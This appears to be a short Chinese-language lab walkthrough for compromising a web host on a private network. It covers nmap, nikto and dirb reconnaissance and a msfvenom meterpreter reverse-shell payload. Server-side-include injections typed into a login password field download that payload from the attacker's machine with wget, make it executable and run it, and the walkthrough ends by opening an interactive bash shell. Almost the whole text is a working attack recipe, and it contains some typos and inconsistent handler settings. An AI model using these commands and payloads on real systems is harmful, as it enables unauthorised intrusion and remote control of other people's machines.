信息探测扫描主机服务信息以及服务版本nmap -sV 192.168.101.54快速扫描主机全部信息nmap -T4 -A -v 192.168.101.54探测敏感信息nikto -host http://192.168.101.54dirb http://192.168.101.54登录浏览器:192.168.101.54根据dirb进行网址挨个探测根据提示来利用对应SSL注入漏洞制作webshell msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.54 lport=4444 -f rawgedit shell.py启动监听 msfconsole use exploit/multi/handler set payload python/meterpreter/reverse_tcp set lhost 192.168.101.51 set lhost 4444 run返回浏览器 用户名输入1 密码输入<!--#EXEC cmd="wget http://192.168.101.51/shell.py" --> 然后将shell复制到/var/www/html中 mv shell.py /var/www/html再然后开启apache服务 service apache2 start再次返回浏览器 密码<!--#EXEC cmd="chmod 777 shell.py" --> 密码<!--#EXEC cmd="pthon shell.py" -->执行操作 sysinfo 查看系统信息 shell 进入系统shell 优化界面 python -c "import pty;pty.spawn('/bin/bash')"